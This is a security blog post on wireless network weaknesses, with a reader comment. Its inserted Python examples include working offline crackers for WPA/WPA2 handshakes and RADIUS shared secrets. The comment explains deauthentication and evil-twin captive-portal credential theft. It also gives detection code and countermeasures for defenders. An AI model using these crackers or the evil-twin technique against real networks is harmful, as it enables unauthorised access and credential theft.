Are Wireless Access Points a Threat to Your Network Security?

In a previous post I explained that AES is the encryption technology that provides the best chance of keeping your data secure and private. Even the United States' intelligence agencies use AES (with 192- or 256-bit keys) to encrypt 'top secret' digital information.

I want to follow up here with a caveat on WiFi security. This time the concern is not the confidentiality of the data in transit but how an attacker gains access to a password-protected wireless network in the first place.

Brute-forcing Passwords

At the Black Hat conference in 2011, German researcher Thomas Roth released his software for cracking the passwords of WPA-protected wireless networks. The attack is the familiar offline one against WPA-PSK: capture the four-way handshake between a client and the access point, then test candidate passphrases against it, which needs no further contact with the network. The software itself is of less interest than the fact that Roth ran those guesses on Amazon's cloud computing service, using about 20 minutes of rented GPU instances at an estimated total cost of $5.40. The caveat worth remembering is that the attack only ever recovers a passphrase that lies in the space being searched; rented hardware lowers the price of each guess, it does not make a long, random passphrase guessable.
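To make the cost model concrete, here is the core of a WPA/WPA2-PSK handshake cracker as an added example (this is not Roth's software or any code from the original post). It derives the PMK with PBKDF2, expands it to the PTK with the 802.11i PRF, and checks the EAPOL MIC from message 2 of the handshake; each candidate passphrase costs exactly that, independently of every other candidate. The SSID, MAC addresses, nonces, passphrase and wordlist are all constructed for the example, and the "captured" message 2 is produced by playing the client side with the real passphrase. The PBKDF2 step is checked against the published IEEE 802.11 test vector (passphrase "password", SSID "IEEE").

```python
import hashlib
import hmac

# Constructed sample handshake parameters (not from a real capture): MAC addresses
# and nonces are arbitrary; the SSID and passphrase are made up for this example.
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("001122334455")      # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")     # supplicant address (SPA)
ANONCE = bytes(range(32))                   # AP nonce from message 1
SNONCE = bytes(range(32, 64))               # client nonce from message 2


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    Those 4096 iterations are the entire cost of one guess; guesses are independent
    of each other, which is what makes the search embarrassingly parallel on rented GPUs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes = 80 bytes, truncated to 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    The KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 with the MIC field zeroed, the form the MIC is computed over.
    Field layout follows 802.1X/802.11i; the replay counter and empty key data are constructed."""
    body = (
        b"\x02"                   # descriptor type: RSN key descriptor
        + b"\x01\x0a"             # key information: MIC set, pairwise, descriptor version 2 (HMAC-SHA1)
        + b"\x00\x10"             # key length
        + b"\x00" * 7 + b"\x01"   # replay counter
        + snonce                  # key nonce (SNonce)
        + b"\x00" * 16            # key IV
        + b"\x00" * 8             # key RSC
        + b"\x00" * 8             # key ID (reserved)
        + b"\x00" * 16            # MIC, zeroed
        + b"\x00\x00"             # key data length (RSN IE omitted in this constructed frame)
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, packet type 3 = EAPOL-Key


def simulate_capture(passphrase: str):
    """Play the client side so we have a 'captured' message 2 and its MIC for the cracker to attack."""
    eapol = build_eapol_msg2(SNONCE)
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol, eapol_mic(ptk[:16], eapol)


def crack_psk(ssid, aa, spa, anonce, snonce, eapol, captured_mic, wordlist):
    """Offline dictionary attack: one PBKDF2 + PRF + HMAC per candidate, no contact with the AP."""
    for candidate in wordlist:
        ptk = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    eapol, mic = simulate_capture("Summer2011!")
    hit = crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, eapol, mic,
                    ["password", "letmein", "Summer2011!", "changeme"])
    print("recovered passphrase:", hit)
```

The loop in `crack_psk` is the whole attack; everything an attacker needs (both MAC addresses, both nonces, message 2 and its MIC) is in the captured handshake, so the only lever a defender has is the size of the space the wordlist has to cover.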

You may say that enterprise wireless networks do not depend on a WPA or WPA2 pre-shared key for their security and so are immune to such attacks; the threat is limited to home networks built around a wireless router.

Standard practice for an enterprise wireless network is for the access point or controller to act as a network access server (NAS) and hand authentication and authorization off to a RADIUS server. This is where the other shoe drops with Roth's software: the same cloud computing power also makes it practical to crack the MD5-based protection that RADIUS applies to passwords on the link between the NAS and the RADIUS server. RADIUS keys that protection with a single shared secret configured on both sides, so an attacker who can capture the traffic (on the wired side of the access point, not over the air) can test guesses for the shared secret offline and, once it is found, unhide every password sent since. With 802.1X the password itself usually travels inside an EAP tunnel rather than as a RADIUS attribute, but the Access-Accept that ends a successful login carries the session's master key wrapped with that same shared secret, so the secret deserves the length and randomness you would demand of any key.
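The following Python is an added example of exactly that exchange (it is not code from the original post and not Roth's tool): it builds an Access-Request with the User-Password attribute hidden as RFC 2865 specifies, builds the server's reply with its Response Authenticator, and then does what an attacker holding a capture of both does, guessing the shared secret offline against the Response Authenticator and using the recovered secret to unhide the password. The user, password, wordlist and the secret itself are constructed; `testing123` is used because it is the well-known example default in the FreeRADIUS configuration and so appears in every wordlist.

```python
import hashlib
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 section 5.2: pad to 16-byte blocks, then c1 = p1 XOR MD5(S || RA),
    c2 = p2 XOR MD5(S || c1), ... The only key material is the shared secret S."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        block = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ b for p, b in zip(padded[i:i + 16], block))
        out += prev
    return out


def unhide_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """The inverse: regenerate the same MD5 stream and XOR it back; strip the NUL padding."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        block = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ b for c, b in zip(hidden[i:i + 16], block))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def attribute(attr_type: int, value: bytes) -> bytes:
    """RADIUS attribute: Type, Length (including these two bytes), Value."""
    return bytes([attr_type, len(value) + 2]) + value


def build_access_request(ident: int, request_auth: bytes, username: bytes, password: bytes, secret: bytes) -> bytes:
    """What the NAS sends: Code, Identifier, Length, a random Request Authenticator, attributes."""
    attrs = attribute(ATTR_USER_NAME, username) + attribute(ATTR_USER_PASSWORD, hide_password(password, secret, request_auth))
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs)) + request_auth + attrs


def build_response(code: int, request: bytes, attrs: bytes, secret: bytes) -> bytes:
    """What the server answers. Response Authenticator =
    MD5(Code || ID || Length || RequestAuth || Attributes || Secret), all but Secret visible on the wire."""
    ident, request_auth = request[1], request[4:20]
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return header + hashlib.md5(header + request_auth + attrs + secret).digest() + attrs


def crack_shared_secret(request: bytes, response: bytes, wordlist):
    """Offline attack on one captured request/response pair: one MD5 per candidate secret."""
    request_auth = request[4:20]
    header, response_auth, attrs = response[:4], response[4:20], response[20:]
    for candidate in wordlist:
        if hashlib.md5(header + request_auth + attrs + candidate).digest() == response_auth:
            return candidate
    return None


def recover_password(request: bytes, secret: bytes):
    """With the shared secret known, the User-Password attribute of any captured request unhides."""
    request_auth, i = request[4:20], 20
    while i + 2 <= len(request):
        attr_type, length = request[i], request[i + 1]
        if attr_type == ATTR_USER_PASSWORD:
            return unhide_password(request[i + 2:i + length], secret, request_auth)
        i += length
    return None


# Constructed exchange: a guessable shared secret (testing123 is the FreeRADIUS example default),
# a made-up user and password, and a random Request Authenticator as the RFC requires.
SECRET = b"testing123"
REQUEST = build_access_request(17, os.urandom(16), b"alice", b"Summer2011!", SECRET)
RESPONSE = build_response(ACCESS_REJECT, REQUEST, b"", SECRET)
WORDLIST = [b"secret", b"radius", b"password", b"testing123", b"changeme"]


def demo():
    """Returns (recovered shared secret, recovered user password)."""
    found = crack_shared_secret(REQUEST, RESPONSE, WORDLIST)
    return found, (recover_password(REQUEST, found) if found else None)


if __name__ == "__main__":
    print(demo())
```

Note that the reject is as useful to the attacker as an accept: any response carries a Response Authenticator, so a single failed login captured on the NAS-to-RADIUS segment is enough to start guessing the shared secret, and the secret, unlike the user's password, is rarely changed and rarely long.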

Besides the usual lockout rules on the access server for attempts that exceed a threshold, you should also monitor the access points and the RADIUS logs for the patterns that imply a persistent brute-force campaign: a run of rejects for one account from one client, one client cycling through many usernames, and a success that arrives right after a burst of failures.
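As an added example of that monitoring (not code from the original post or from any particular product), here is a small sliding-window detector run over constructed log lines. The log format is made up for the example, but the fields it uses, the result, the username, the NAS and the client MAC (the Calling-Station-Id), are ones any RADIUS server or wireless controller can log. The detector keys on the client MAC rather than the username because that is what stays constant while an attacker cycles passwords or usernames.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines in a simplified, made-up format: one line per RADIUS decision.
SAMPLE_LOG = """\
2011-03-04T10:15:00 radius: Access-Reject user=alice nas=ap-3f client=00:11:22:33:44:55
2011-03-04T10:15:06 radius: Access-Reject user=alice nas=ap-3f client=00:11:22:33:44:55
2011-03-04T10:15:12 radius: Access-Reject user=alice nas=ap-3f client=00:11:22:33:44:55
2011-03-04T10:15:18 radius: Access-Reject user=alice nas=ap-3f client=00:11:22:33:44:55
2011-03-04T10:15:24 radius: Access-Reject user=alice nas=ap-3f client=00:11:22:33:44:55
2011-03-04T10:15:30 radius: Access-Reject user=bob nas=ap-3f client=66:77:88:99:aa:bb
2011-03-04T10:15:35 radius: Access-Reject user=carol nas=ap-3f client=66:77:88:99:aa:bb
2011-03-04T10:15:40 radius: Access-Reject user=dave nas=ap-3f client=66:77:88:99:aa:bb
2011-03-04T10:15:50 radius: Access-Accept user=alice nas=ap-3f client=00:11:22:33:44:55
2011-03-04T10:20:00 radius: Access-Reject user=erin nas=ap-1a client=cc:dd:ee:ff:00:11
"""

LINE = re.compile(
    r"^(?P<ts>\S+) radius: (?P<result>Access-(?:Accept|Reject)) "
    r"user=(?P<user>\S+) nas=(?P<nas>\S+) client=(?P<mac>\S+)$"
)


def detect(lines, window=timedelta(seconds=60), reject_threshold=5, spray_threshold=3):
    """Sliding-window detector keyed on the client MAC. Returns (kind, mac) alerts:
      bruteforce             - reject_threshold rejects from one client inside the window
      spray                  - spray_threshold distinct usernames rejected from one client
      success_after_failures - an accept from a client still inside a burst of rejects
    Each kind fires once per client so a long campaign does not flood the console."""
    recent = defaultdict(deque)     # mac -> deque of (timestamp, username) for rejects
    alerts, fired = [], set()

    def fire(kind, mac):
        if (kind, mac) not in fired:
            fired.add((kind, mac))
            alerts.append((kind, mac))

    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        ts, mac = datetime.fromisoformat(m["ts"]), m["mac"]
        q = recent[mac]
        while q and ts - q[0][0] > window:        # drop rejects older than the window
            q.popleft()
        if m["result"] == "Access-Accept":
            if len(q) >= reject_threshold:        # the guess that finally worked
                fire("success_after_failures", mac)
            continue
        q.append((ts, m["user"]))
        if len(q) >= reject_threshold:
            fire("bruteforce", mac)
        if len({user for _, user in q}) >= spray_threshold:
            fire("spray", mac)
    return alerts


if __name__ == "__main__":
    for kind, mac in detect(SAMPLE_LOG.splitlines()):
        print(f"{kind:24s} {mac}")
```

The thresholds are deliberately low for the sample; on a real network they should be set from a baseline of how often legitimate clients fail (a typo, an expired password cached on a phone) so that the success-after-failures alert in particular stays rare enough to be looked at by a person.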


  • Mixed feelings on this topic. Now if you are using pre-shared keys and simply hiding your SSID to secure your wireless network, and filtering based on MAC, you are not secure, but rather making life harder on yourself and your users. Instead look at options to use captive portals, certificates, and RADIUS authentication. It is a little extra setup time, but well worth the time spent.

    DISCLAIMER: THE BELOW OUTLINE EXPLAINS HOW A WIRELESS ATTACK MAY BE CARRIED OUT FOR SECURITY AWARENESS, YOU SHOULD NEVER ATTEMPT TO BREAK INTO ANOTHER WIRELESS NETWORK WITHOUT WRITTEN PERMISSION FROM THE NETWORK OWNER.

    Why hiding the SSID does not work, and never did: Access points are only one side of the beacon request; clients are louder, and this is where WiFi has the largest flaw. Once a client has connected, the next time it disconnects it will broadcast every SSID it has ever connected to in an effort to find the next WAP. There are a number of reasons a client may get disconnected, even if only for a split second. These include weak signals, interference from other radio gear and wireless operating on the same channel and frequency, and wireless deauth attacks.


    How to get clients to tell me the magic word: Wireless deauthentication attacks are used to trick both the access point and the client into thinking they are disconnected. Why is this possible? It is a basic part of the protocol: basically a packet is sent to the WAP and client at the same time, each saying to the other "I'm disconnecting from you." After which the client sends out its requests to reconnect, which contain the SSID.


    So now you have the SSID; what can you do with it? Actually there are a number of things you can do, and while WPA2 Enterprise does limit the attack vector, there is still one thing that can work. Users are busy, they get frustrated, and they don't always read every popup on their screen. Social engineering, or the art of getting someone to do something they normally would not, is alive and well in the wireless world. Simply set up an access point, give it the same SSID and some internet to reward the user with once they connect, and use a captive portal to collect usernames and passwords. A captive portal is just a simple webpage that users see when they connect. Many devices complain briefly that the security is different with the fake SSID, but most users don't bother to read the warning and just click through. At this point you probably have enough information to connect to the wireless network directly, or simply place your access point as a "Man in the Middle" device.

    ---- So how to prevent this type of attack? ----

    - Wireless Intrusion Detection is a method; think IDS/IPS for wireless (not all solutions are equal)

    - User education (help them to )

    - Testing devices to make sure they don't connect to unsecured APs automatically

    - Wireless Geo-location, being able to know where users are based on the APs that can see the user (not always very good)

    - I'm open to suggestions.

    Also I recommend you try wireless hacking on your own networks or lab wireless networks. You'll find tools ranging from free to $99 or even more than $1,000. It is money well spent and gives you first-hand experience in how easy it is to break into a wireless network, or even just attack the end wireless user, so you can design the correct controls. AGAIN, ONLY ATTACK NETWORKS YOU OWN (stay out of legal trouble), and probably make sure you don't do so during Netflix prime time at home either, to keep your family happy (or every time the network goes down you will get questioned about whether you're hacking the wireless again).
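The two mechanisms the comment above relies on, probe requests that name every remembered SSID and deauthentication frames that nothing authenticates, are both visible to a monitor-mode capture, and they are what the "wireless intrusion detection" it lists as a countermeasure keys on. The following Python is an added example (not from the original post or its commenter): it builds a small constructed capture of raw 802.11 management frames, parses them, lists the SSIDs each client leaks, and flags a deauth flood against a BSSID. Frame layouts follow IEEE 802.11 (no radiotap header); the MAC addresses, SSIDs, timestamps and thresholds are made up.

```python
import struct
from collections import defaultdict

TYPE_MGMT = 0
SUBTYPE_PROBE_REQUEST = 4
SUBTYPE_DEAUTH = 12
BROADCAST = b"\xff" * 6


def mac_str(addr: bytes) -> str:
    return ":".join(f"{b:02x}" for b in addr)


def build_mgmt_frame(subtype: int, addr1: bytes, addr2: bytes, addr3: bytes, body: bytes, seq: int = 0) -> bytes:
    """802.11 management frame: frame control (type 0, given subtype, no flags), duration,
    addr1 (DA), addr2 (SA), addr3 (BSSID), sequence control, then the frame body."""
    frame_control = bytes([(subtype << 4) | (TYPE_MGMT << 2), 0x00])
    return frame_control + b"\x00\x00" + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4) + body


def build_probe_request(client: bytes, ssid: str) -> bytes:
    """What a client sends while looking for a known network: a broadcast frame whose body
    carries the SSID information element (ID 0) in the clear, plus a supported-rates element."""
    ssid_bytes = ssid.encode()
    body = bytes([0, len(ssid_bytes)]) + ssid_bytes + bytes([1, 1, 0x82])
    return build_mgmt_frame(SUBTYPE_PROBE_REQUEST, BROADCAST, client, BROADCAST, body)


def build_deauth(dst: bytes, src: bytes, bssid: bytes, reason: int = 7) -> bytes:
    """Deauthentication: addresses plus a two-byte reason code and nothing that proves who sent it,
    which is why a forged one is accepted. Reason 7 = class 3 frame from a non-associated station."""
    return build_mgmt_frame(SUBTYPE_DEAUTH, dst, src, bssid, struct.pack("<H", reason))


def parse_frame(frame: bytes):
    """Return (type, subtype, addr1, addr2, addr3, body) for a frame without radiotap header."""
    fc0 = frame[0]
    return (fc0 >> 2) & 0x3, fc0 >> 4, frame[4:10], frame[10:16], frame[16:22], frame[24:]


def parse_ies(body: bytes) -> dict:
    """Tagged parameters: repeated (ID, length, value)."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        eid, length = body[i], body[i + 1]
        ies[eid] = body[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def analyse(capture, window_s: float = 5.0, deauth_threshold: int = 10):
    """capture: list of (timestamp_seconds, frame). Collects the SSIDs each client probes for
    and flags a BSSID that receives deauth_threshold deauthentication frames inside window_s
    seconds (a real disconnect needs one frame; a flood is the attack the comment describes)."""
    probed = defaultdict(set)
    deauth_times = defaultdict(list)
    alerts = []
    for ts, frame in capture:
        ftype, subtype, addr1, addr2, addr3, body = parse_frame(frame)
        if ftype != TYPE_MGMT:
            continue
        if subtype == SUBTYPE_PROBE_REQUEST:
            ssid = parse_ies(body).get(0, b"")
            if ssid:                                  # empty SSID = wildcard probe, leaks nothing
                probed[mac_str(addr2)].add(ssid.decode("utf-8", "replace"))
        elif subtype == SUBTYPE_DEAUTH:
            bssid = mac_str(addr3)
            times = [t for t in deauth_times[bssid] if ts - t <= window_s] + [ts]
            deauth_times[bssid] = times
            if len(times) == deauth_threshold:        # fire once, when the threshold is crossed
                reason = struct.unpack("<H", body[:2])[0]
                alerts.append(("deauth_flood", bssid, reason))
    return dict(probed), alerts


# Constructed capture: one laptop probing for the networks it remembers, then an attacker
# spoofing the AP's address to deauthenticate it twelve times in about a tenth of a second.
AP = bytes.fromhex("001122334455")
LAPTOP = bytes.fromhex("66778899aabb")
CAPTURE = [(i * 0.1, build_probe_request(LAPTOP, s)) for i, s in enumerate(["CorpWiFi", "HomeNet", "CoffeeShop"])]
CAPTURE += [(1.0 + i * 0.01, build_deauth(LAPTOP, AP, AP)) for i in range(12)]

if __name__ == "__main__":
    probed, alerts = analyse(CAPTURE)
    print(probed)
    print(alerts)
```

The probe-request half is also the quickest way to test the commenter's claim on your own devices: a few minutes of monitor-mode capture near a laptop or phone shows which remembered networks it still asks for by name, and those are the SSIDs an evil twin would use.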
